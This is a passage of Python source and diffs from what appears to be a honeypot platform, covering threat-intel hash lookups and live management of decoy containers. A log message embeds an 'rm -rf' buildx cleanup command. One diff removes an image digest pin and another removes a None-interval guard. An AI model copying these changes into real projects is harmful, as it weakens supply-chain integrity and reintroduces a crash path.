:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
the provider logs one warning at first refresh attempt and disables
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
without ever making a network call. The ingester treats that the same
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
bus payload (which is exactly what the predicate's ``is True`` check
does today, so the silent-no-op is behaviorally identical to "lane not
shipped yet").
"""
from __future__ import annotations
import csv
import io
import os
import time
import zipfile
from typing import Optional
from decnet.intel.base import MalHashProvider
from decnet.logging import get_logger
from decnet.net.http import stealth_client
log = get_logger("intel.mal_hash")
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
def _read_refresh_interval() -> float:
    """Read the feed refresh interval (seconds) from the environment.

    Returns:
        The value of ``DECNET_MAL_HASH_REFRESH_INTERVAL_S`` as a float,
        or ``_DEFAULT_REFRESH_S`` when the variable is unset, not
        parseable as a float, NaN, or negative.

    ``float()`` happily parses ``"nan"`` and negative numbers. NaN is
    rejected because every ``elapsed >= interval`` comparison against it
    is false, which would stop the feed from ever refreshing after the
    first load. Negative values are rejected as obvious misconfiguration.
    ``inf`` is deliberately still accepted (it reads as "never refresh").
    """
    import math  # local import: only needed for the NaN check below

    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
    if raw is None:
        return _DEFAULT_REFRESH_S
    try:
        value = float(raw)
    except ValueError:
        log.warning(
            "%s=%r not a float; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    if math.isnan(value) or value < 0:
        log.warning(
            "%s=%r must be a non-negative number; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    return value
class MalwareBazaarProvider(MalHashProvider):
    """Bulk SHA-256 lookup against MalwareBazaar's full export.

    The whole feed is downloaded into an in-memory ``set`` and refreshed
    once it is older than ``refresh_interval_s``. Without an auth key
    the provider is permanently disabled and never touches the network.
    """

    name = "malwarebazaar"

    # Minimum wait after a FAILED refresh before the next attempt.
    # Without it, an unreachable feed makes every ``is_known_bad`` call
    # re-issue the download and block on its 60 s timeout.
    _RETRY_BACKOFF_S: float = 60.0

    def __init__(
        self,
        *,
        auth_key: Optional[str] = None,
        refresh_interval_s: Optional[float] = None,
    ) -> None:
        """Configure the provider.

        Args:
            auth_key: MalwareBazaar Auth-Key. Falls back to the
                ``DECNET_MALWAREBAZAAR_AUTH_KEY`` environment variable;
                an empty value counts as unset.
            refresh_interval_s: Maximum feed age in seconds. Falls back
                to :func:`_read_refresh_interval` when ``None``.
        """
        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
        self._refresh_interval_s = (
            refresh_interval_s
            if refresh_interval_s is not None
            else _read_refresh_interval()
        )
        self._known: set[str] = set()
        self._loaded_at: float = 0.0
        self._last_error: Optional[str] = None
        self._disabled_warned: bool = False
        # ``time.monotonic()`` deadline before which a refresh must not
        # be retried; ``None`` when the last attempt succeeded (or none
        # was made yet).
        self._retry_not_before: Optional[float] = None

    @property
    def disabled(self) -> bool:
        """True when no auth key is configured."""
        return self._auth_key is None

    async def _refresh(self) -> Optional[str]:
        """Refetch the bulk feed. Returns an error string or ``None``.

        On success the hash set, load timestamp and last-error field are
        replaced; on any failure the previously loaded set is kept.
        """
        if self._auth_key is None:
            return "no auth key"
        try:
            async with stealth_client(timeout=60.0) as client:
                resp = await client.get(
                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
                )
        except Exception as exc:  # noqa: BLE001
            return f"network: {exc}"
        if resp.status_code != 200:
            return f"HTTP {resp.status_code}"
        body = resp.content
        try:
            new_known = _parse_dump(body)
        except Exception as exc:  # noqa: BLE001
            return f"parse: {exc}"
        if not new_known:
            # An empty parse is treated as a failure so a bad download
            # never wipes a good set.
            return "feed: empty"
        self._known = new_known
        self._loaded_at = time.monotonic()
        self._last_error = None
        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
        return None

    async def _ensure_fresh(self) -> None:
        """Refresh the feed when it is empty or older than the interval.

        Refresh failures are logged and recorded, never raised. After a
        failure no new attempt is made for ``_RETRY_BACKOFF_S`` seconds;
        successful refreshes are scheduled purely by the interval.
        """
        if self.disabled:
            if not self._disabled_warned:
                log.warning(
                    "R0046 mal_hash_match disabled: %s unset",
                    _AUTH_KEY_ENV,
                )
                self._disabled_warned = True
            return
        now = time.monotonic()
        stale = (
            not self._known
            or (now - self._loaded_at) >= self._refresh_interval_s
        )
        if not stale:
            return
        if self._retry_not_before is not None and now < self._retry_not_before:
            # Still backing off from the previous failure; answer from
            # whatever set is currently loaded.
            return
        err = await self._refresh()
        if err:
            self._last_error = err
            self._retry_not_before = time.monotonic() + self._RETRY_BACKOFF_S
            log.warning("malwarebazaar refresh failed: %s", err)
        else:
            self._retry_not_before = None

    async def is_known_bad(self, sha256: str) -> bool:
        """Return True when *sha256* (any letter case) is in the feed.

        Never raises: a disabled provider, a failed refresh or a non-str
        argument all yield ``False``.
        """
        if self.disabled:
            return False
        if not isinstance(sha256, str):
            # Honour the "MUST NOT raise" contract for malformed input.
            return False
        try:
            await self._ensure_fresh()
        except Exception as exc:  # noqa: BLE001
            # Belt and braces: _ensure_fresh swallows refresh failures
            # but a bug in there shouldn't blow up the ingester payload.
            log.exception("malwarebazaar refresh raised: %s", exc)
            return False
        return sha256.lower() in self._known
def _parse_dump(body: bytes) -> set[str]:
    """Turn a raw MalwareBazaar download into a set of SHA-256 hashes.

    The payload is either a ZIP archive (detected by the ``PK`` magic
    bytes) whose first ``.csv`` member holds the table, or the CSV
    itself. Decoding is UTF-8 with replacement, and hash extraction and
    validation are delegated to :func:`_extract_hashes`.

    Raises:
        ValueError: the archive contains no ``.csv`` member.
    """
    if body[:2] != b"PK":
        # Not a ZIP: treat the payload as the CSV itself.
        raw_csv = body
    else:
        with zipfile.ZipFile(io.BytesIO(body)) as archive:
            members = [
                member for member in archive.namelist()
                if member.lower().endswith(".csv")
            ]
            if not members:
                raise ValueError("zip has no .csv member")
            raw_csv = archive.read(members[0])
    return _extract_hashes(raw_csv.decode("utf-8", errors="replace"))
def _extract_hashes(text: str) -> set[str]:
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
The dump prefaces the table with ``#``-prefixed comment lines.
Skip those, find the header row, locate the column, then read the
rest. csv.reader handles the quoting (the ``signature`` column
contains commas and is properly quoted in the dump).
"""
body_lines = [
line for line in text.splitlines()
if line and not line.lstrip().startswith("#")
]
if not body_lines:
return set()
reader = csv.reader(body_lines)
header = next(reader, None)
if not header:
return set()
norm = [h.strip().strip('"').lower() for h in header]
try:
col = norm.index("sha256_hash")
except ValueError:
# Fallback — first column is sha256 in every documented
# variant; if the header naming changes upstream we still
# capture something rather than silently emptying the set.
col = 0
out: set[str] = set()
for row in reader:
if len(row) <= col:
continue
cell = row[col].strip().strip('"').lower()
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
out.add(cell)
return out

View File

@@ -12,6 +12,7 @@ caps requests/min — the provider works either way.
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -70,10 +71,7 @@ class ThreatFoxProvider(IntelProvider):
verdict=None, # absence is not a benign signal
column_updates={
"threatfox_listed": False,
"threatfox_threat_types": [],
"threatfox_ioc_types": [],
"threatfox_malware_families": [],
"threatfox_raw": {},
"threatfox_raw": "{}",
"threatfox_queried_at": datetime.now(timezone.utc),
},
)
@@ -85,37 +83,12 @@ class ThreatFoxProvider(IntelProvider):
data = payload.get("data") or []
listed = bool(data)
# Each match in ``data`` carries threat_type / ioc_type / malware
# (canonical family). The IntelLifter dispatches ATT&CK techniques
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
# cc_skimming); the other two columns are evidence and SIEM
# context. Sets are flattened across matches and serialised
# sorted for determinism.
threat_types: set[str] = set()
ioc_types: set[str] = set()
families: set[str] = set()
if isinstance(data, list):
for entry in data:
if not isinstance(entry, dict):
continue
tt = entry.get("threat_type")
if isinstance(tt, str) and tt:
threat_types.add(tt)
it = entry.get("ioc_type")
if isinstance(it, str) and it:
ioc_types.add(it)
family = entry.get("malware") or entry.get("malware_printable")
if isinstance(family, str) and family:
families.add(family)
return IntelResult(
provider=self.name,
verdict="malicious" if listed else None,
column_updates={
"threatfox_listed": listed,
"threatfox_threat_types": sorted(threat_types),
"threatfox_ioc_types": sorted(ioc_types),
"threatfox_malware_families": sorted(families),
"threatfox_raw": data,
"threatfox_raw": json.dumps(data),
"threatfox_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -59,38 +59,6 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
return None
def _build_intel_event_payload(
attacker_uuid: str,
ip: str,
row: dict[str, Any],
providers: list[IntelProvider],
) -> dict[str, Any]:
"""Project the AttackerIntel row into the bus event the TTP worker
consumes as ``source_kind="intel"``.
"""
return {
"attacker_uuid": attacker_uuid,
"attacker_ip": ip,
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
# AbuseIPDB
"abuseipdb_score": row.get("abuseipdb_score"),
"abuseipdb_categories": row.get("abuseipdb_categories") or [],
# GreyNoise
"greynoise_classification": row.get("greynoise_classification"),
"greynoise_name": row.get("greynoise_name"),
"greynoise_tags": row.get("greynoise_tags") or [],
# Feodo
"feodo_listed": row.get("feodo_listed"),
"feodo_malware_family": row.get("feodo_malware_family"),
# ThreatFox
"threatfox_listed": row.get("threatfox_listed"),
"threatfox_threat_types": row.get("threatfox_threat_types") or [],
"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
"threatfox_malware_families": row.get("threatfox_malware_families") or [],
}
async def _enrich_one(
attacker_uuid: str,
ip: str,
@@ -204,9 +172,12 @@ async def run_intel_loop(
await publish_safely(
bus,
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
_build_intel_event_payload(
attacker_uuid, ip, row, providers,
),
{
"attacker_uuid": attacker_uuid,
"attacker_ip": ip,
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
},
event_type=_topics.ATTACKER_INTEL_ENRICHED,
)
except Exception: # noqa: BLE001
@@ -229,11 +200,11 @@ async def run_intel_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
self.component = component
def filter(self, record: logging.LogRecord) -> bool:
record.decnet_component = self.component
record.decnet_component = self.component # type: ignore[attr-defined]
return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
span = trace.get_current_span()
ctx = span.get_span_context()
if ctx and ctx.trace_id:
record.otel_trace_id = format(ctx.trace_id, "032x")
record.otel_span_id = format(ctx.span_id, "016x")
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
else:
record.otel_trace_id = "0"
record.otel_span_id = "0"
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
except Exception:
record.otel_trace_id = "0"
record.otel_span_id = "0"
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
return True

View File

@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
services: list[str] = PydanticField(..., min_length=1)
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
base_image: str # Docker image for the base/IP-holder container
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
hostname: str
archetype: str | None = None # archetype slug if spawned from an archetype profile
service_config: dict[str, dict] = PydanticField(default_factory=dict)

View File

@@ -101,10 +101,7 @@ async def mutate_decky(
try:
# Wrap blocking call in thread
cp = compose_path
await anyio.to_thread.run_sync(
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
)
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
except Exception as e:
log.error("mutation failed decky=%s error=%s", decky_name, e)
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -164,8 +161,6 @@ async def mutate_all(
if force or only is not None:
due = True
else:
if interval_mins is None:
continue
elapsed_secs = now - decky.last_mutated
due = elapsed_secs >= (interval_mins * 60)
remaining = (interval_mins * 60) - elapsed_secs
@@ -289,13 +284,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
return 0
drained = 0
for topo in pending:
tid = topo.id
tid = topo["id"]
try:
await _deployer.resync_agent_topology(repo, tid)
await repo.set_topology_resync(tid, False)
drained += 1
log.info("topology %s resynced to agent %s",
tid, topo.target_host_uuid)
tid, topo.get("target_host_uuid"))
except Exception as exc: # noqa: BLE001
log.warning(
"topology %s resync failed (will retry): %s", tid, exc,
@@ -410,11 +405,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -98,463 +98,6 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
)
async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.

    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands.

    Args:
        repo: Repository used to load the topology and hydrate it.
        topology_id: Topology being edited.
        created: ``(lan_name, subnet, is_dmz)`` of a LAN to create; the
            bridge is made ``internal`` unless ``is_dmz`` is true.
        removed: Name of a LAN whose bridge should be removed.

    Skips when:

    * the topology does not exist or is not active/degraded (a pending
      topology gets its networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host
      materialisation isn't implemented; the agent's apply_topology RPC
      re-renders the whole compose at next push).

    Docker SDK / networking failures — including failure to build the
    client — are logged, not re-raised: the DB row is the source of
    truth. The client is always closed before returning.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    status = topology.status
    if status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return

    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose

    client = None
    try:
        # Built inside the guarded region so a client-construction
        # failure is logged like any other docker error.
        client = docker.from_env()
        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.
        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )
        # Re-render compose so the file on disk matches the DB. Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
    finally:
        if client is not None:
            # Release the SDK's HTTP session instead of leaking it on
            # every live LAN op.
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug("live LAN op: docker client close failed: %s", exc)
def _is_buildx_wedge(exc: BaseException) -> bool:
    """Report whether *exc* carries both buildx EROFS-wedge signatures.

    The search text is the exception's ``stderr`` attribute (when
    present and truthy) joined with ``str(exc)``, lowercased. Both are
    consulted because ``_compose_with_retry`` raises a synthetic
    CalledProcessError whose ``stderr`` holds the recovery hint with the
    wedge signatures preserved verbatim.
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )

    captured = getattr(exc, "stderr", None)
    stderr_text = str(captured) if captured else ""
    combined = f"{stderr_text} {exc}".lower()
    return all(
        signature in combined
        for signature in (_BUILDX_WEDGE_SIGNATURE, _BUILDX_EROFS_SIGNATURE)
    )
async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
) -> None:
    """Run a compose command; on a buildx wedge, retry once with the legacy builder.

    The first attempt calls ``_compose_with_retry(*args, compose_file=...)``
    in a worker thread. If it raises and :func:`_is_buildx_wedge`
    recognises the error, a warning is logged and the same command is
    run once more with ``env={"DOCKER_BUILDKIT": "0"}``. Any other
    error, and any error from the second attempt, propagates.

    *label* appears only in the warning so an operator can trace the
    fall-back to the operation that triggered it.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry

    def _first_attempt():
        return _compose_with_retry(*args, compose_file=compose_file)

    def _legacy_builder_attempt():
        return _compose_with_retry(
            *args, compose_file=compose_file,
            env={"DOCKER_BUILDKIT": "0"},
        )

    try:
        await anyio.to_thread.run_sync(_first_attempt)
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder). Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    else:
        return
    # Deliberately outside the ``except`` so a second failure does not
    # carry the first failure as chained context.
    await anyio.to_thread.run_sync(_legacy_builder_attempt)
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """List the compose service names that make up one decky.

    The result always starts with the base container (``decky_name``)
    followed by ``"<decky_name>-<service>"`` for each requested service.
    Services whose registry entry is marked ``fleet_singleton`` are left
    out — the same filter the compose renderer applies
    (:mod:`decnet.topology.compose.generate_topology_compose`).
    """
    from decnet.services.registry import get_service

    names = [decky_name]
    for service in services:
        known = True
        try:
            spec = get_service(service)
        except KeyError:
            # Unknown service: keep the name so compose reports a clear
            # "no such service" error instead of it vanishing silently.
            known = False
        if known and spec.fleet_singleton:
            continue
        names.append(f"{decky_name}-{service}")
    return names
async def _live_topology_or_none(
repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
"""Return the topology row only when it's eligible for live materialisation.
Returns None (so callers can skip with a single ``if`` check) when:
* the topology doesn't exist;
* status is not ``active`` or ``degraded`` (pending topologies get
everything materialised at deploy time);
* the topology is pinned to a swarm agent (cross-host live editing
is its own routing workstream).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return None
if topology.status not in ("active", "degraded"):
return None
if topology.target_host_uuid:
_log.info(
"live decky op skipped (agent-pinned topology=%s); "
"next agent push will reconcile",
topology_id,
)
return None
return topology
async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Rewrite the topology's compose file from the current DB state.

    Run after a materialisation step so the file on disk tracks the
    topology rows. Does nothing when ``hydrate`` returns ``None``; a
    failure while writing is logged as a warning and swallowed so it
    cannot poison the DB-side mutation.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose

    snapshot = await hydrate(repo, topology_id)
    if snapshot is not None:
        try:
            write_topology_compose(snapshot, _topology_compose_path(topology_id))
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live op: compose re-render failed topology=%s: %s",
                topology_id, exc,
            )
async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
    """Bring up one decky (base + services) with ``compose up -d --no-deps --build``.

    The compose file is re-rendered first so it already lists the new
    decky.

    Returns:
        ``True`` when compose-up completed without raising. ``False``
        when it failed (logged, not re-raised — the DB row is the source
        of truth) or when the topology is not eligible for live
        materialisation, so callers do not mark the decky ``running``
        after a no-op.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return False

    from decnet.engine.deployer import _topology_compose_path

    await _rerender_compose(repo, topology_id)
    compose_targets = _decky_targets(decky_name, services)
    compose_file = _topology_compose_path(topology_id)
    succeeded = False
    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *compose_targets,
            compose_file=compose_file,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
        succeeded = True
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
    return succeeded
async def _materialise_decky_remove(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
    """Stop and force-remove one decky's containers, then re-render compose.

    Does nothing for topologies not eligible for live materialisation.
    ``compose stop`` and ``compose rm -f`` are attempted independently;
    a failure of either is logged as a warning and does not prevent the
    other step or the final re-render.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    compose_targets = _decky_targets(decky_name, services)
    compose_file = _topology_compose_path(topology_id)

    # Order matters: stop + rm run against the compose file as it is
    # now. Once re-rendered, the file no longer mentions the decky and
    # compose would find no service to act on.
    steps = (
        (
            ("stop",),
            "live remove_decky: compose stop failed topology=%s decky=%s: %s",
        ),
        (
            ("rm", "-f"),
            "live remove_decky: compose rm failed topology=%s decky=%s: %s",
        ),
    )
    for verb, failure_message in steps:
        try:
            await anyio.to_thread.run_sync(
                lambda verb=verb: _compose(
                    *verb, *compose_targets, compose_file=compose_file,
                ),
            )
        except Exception as exc:  # noqa: BLE001
            _log.warning(failure_message, topology_id, decky_name, exc)
    await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
    repo: Any, topology_id: str,
    decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
    """SDK ``network.connect`` to multi-home a running base container.

    Service containers share the base's netns via ``network_mode:
    service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
    the base alone gives every service container the new interface for
    free — we don't need to iterate.

    Args:
        repo: Repository used for the eligibility check and re-render.
        topology_id: Topology that owns the decky and the LAN.
        decky_name: Decky whose base container is attached.
        lan_name: LAN whose docker network is joined.
        ipv4_address: Address to assign on that network.

    Does nothing for topologies not eligible for live materialisation.
    Docker errors are logged, never raised; an "already connected"
    API error is treated as success. The docker client is closed before
    the compose file is re-rendered.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.connect(container, ipv4_address=ipv4_address)
    except docker.errors.APIError as exc:
        # Idempotency — already on the network is fine.
        msg = str(exc).lower()
        # Parenthesised to spell out the precedence Python already applies.
        if "already" in msg or ("endpoint" in msg and "exists" in msg):
            _log.info(
                "live attach_decky: %s already on network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        if client is not None:
            # Release the SDK's HTTP session instead of leaking one per
            # attach operation.
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug("live attach_decky: docker client close failed: %s", exc)
    await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
    repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
    """SDK ``network.disconnect`` to drop a multi-home edge.

    Args:
        repo: Repository used for the eligibility check and re-render.
        topology_id: Topology that owns the decky and the LAN.
        decky_name: Decky whose base container is detached.
        lan_name: LAN whose docker network is left.

    Does nothing for topologies not eligible for live materialisation.
    Docker errors are logged, never raised; "not connected" / "no such"
    API errors are treated as already-detached. The docker client is
    closed before the compose file is re-rendered.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import docker
    from decnet.topology.compose import _container_name, _network_name

    net_name = _network_name(topology_id, lan_name)
    container_name = _container_name(topology_id, decky_name)
    client = None
    try:
        client = docker.from_env()
        net = client.networks.get(net_name)
        container = client.containers.get(container_name)
        net.disconnect(container)
    except docker.errors.APIError as exc:
        # Idempotency — already off the network (or gone) is fine.
        msg = str(exc).lower()
        if "not connected" in msg or "no such" in msg:
            _log.info(
                "live detach_decky: %s already off network %s — skipping",
                container_name, net_name,
            )
        else:
            _log.error(
                "live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
                topology_id, decky_name, lan_name, exc,
            )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
            topology_id, decky_name, lan_name, exc,
        )
    finally:
        if client is not None:
            # Release the SDK's HTTP session instead of leaking one per
            # detach operation.
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug("live detach_decky: docker client close failed: %s", exc)
    await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
    repo: Any, topology_id: str,
    decky_name: str,
    added: list[str],
    removed: list[str],
) -> None:
    """Add/remove per-service containers without touching siblings.

    Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
    without coupling the mutator to that module — service mutations
    routed via the mutator queue publish ``mutation.applied`` while the
    direct API publishes ``decky.<name>.service_added``; they share
    machinery, not control flow.

    Args:
        repo: Repository used for the eligibility check and re-render.
        topology_id: Topology that owns the decky.
        decky_name: Decky whose service set changed.
        added: Service names to bring up.
        removed: Service names to stop and remove.

    Order of operations:

    1. ``compose stop`` + ``compose rm -f`` for the removed services,
       run against the compose file as it currently is on disk;
    2. re-render the compose file from the DB;
    3. ``compose up -d --no-deps --build`` for the added services.

    Removal has to precede the re-render for the reason spelled out in
    ``_materialise_decky_remove``: once re-rendered, the file no longer
    lists what was removed and compose has nothing to act on.
    NOTE(review): assumes the caller has already persisted the new
    service list, as the other materialise helpers do — confirm.

    No-op when both lists are empty or the topology is not eligible for
    live materialisation. Every docker failure is logged, never raised.
    """
    if not added and not removed:
        return
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import _compose, _topology_compose_path

    compose_path = _topology_compose_path(topology_id)

    # [1:] drops the base container: only per-service containers change.
    rm_targets = _decky_targets(decky_name, list(removed))[1:]
    if rm_targets:
        for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
            try:
                await anyio.to_thread.run_sync(
                    lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path),  # type: ignore[misc]
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live update_decky %s failed topology=%s decky=%s: %s",
                    action_name, topology_id, decky_name, exc,
                )

    await _rerender_compose(repo, topology_id)

    add_targets = _decky_targets(decky_name, list(added))[1:]  # drop the base
    if add_targets:
        try:
            await _compose_up_with_buildkit_fallback(
                "up", "-d", "--no-deps", "--build", *add_targets,
                compose_file=compose_path,
                label=f"live update_decky add topology={topology_id} decky={decky_name}",
            )
        except Exception as exc:  # noqa: BLE001
            _log.error(
                "live update_decky add: compose up failed topology=%s decky=%s: %s",
                topology_id, decky_name, exc,
            )
async def _materialise_decky_recreate_base(
    repo: Any, topology_id: str, decky_name: str,
) -> None:
    """Force-recreate only the decky's base container (forwards_l3 flips).

    DESTRUCTIVE: any state inside the base container is lost. Service
    containers re-attach through ``network_mode: service:<base>`` once
    the base is back. The caller must gate this behind an explicit
    operator-supplied ``force=true``.

    Does nothing for topologies not eligible for live materialisation.
    The compose file is re-rendered first; a compose failure is logged
    as an error and not re-raised.
    """
    if await _live_topology_or_none(repo, topology_id) is None:
        return

    import anyio
    from decnet.engine.deployer import (
        _compose_with_retry, _topology_compose_path,
    )

    await _rerender_compose(repo, topology_id)
    compose_file = _topology_compose_path(topology_id)

    def _recreate():
        return _compose_with_retry(
            "up", "-d", "--no-deps", "--force-recreate", decky_name,
            compose_file=compose_file,
        )

    try:
        await anyio.to_thread.run_sync(_recreate)
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live update_decky recreate_base failed topology=%s decky=%s: %s",
